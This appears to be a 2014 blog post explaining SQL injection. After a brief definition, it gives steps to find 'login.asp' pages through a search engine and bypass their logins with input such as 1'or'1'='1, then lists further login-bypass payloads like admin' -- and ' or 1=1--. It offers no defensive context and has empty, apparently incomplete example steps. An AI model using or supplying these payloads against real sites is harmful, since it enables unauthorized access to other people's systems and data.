Saturday 15 March 2014

sql injection with example explained

What is SQL Injection?

SQL Injection is a type of web application security vulnerability in which an attacker is able to submit a database SQL command which is executed by a web application, exposing the back-end database. A SQL Injection attack can occur when a web application utilizes user-supplied data without proper validation or encoding as part of a command or query. The specially crafted user data tricks the application into executing unintended commands or changing data. SQL Injection allows an attacker to create, read, update, alter, or delete data stored in the back-end database.
SQL injection is a code injection technique, used to attack data driven applications, in which malicious SQL statements are inserted into an entry field for execution.

Sql Injection example
Step 1
Find login.asp page in search engin
step 2
username:    1'or'1'='1
password:      1'or'1'='1




 
sql injection example in asp.net
STEP 1:
  
 Step 2:


Bypassing Login Screens
SQL Injection Login tricks
  admin' --
    admin' #
    admin'/*
    ' or 1=1--
    ' or 1=1#
    ' or 1=1/*
    ') or '1'='1--
    ') or ('1'='1--

No comments:

Post a Comment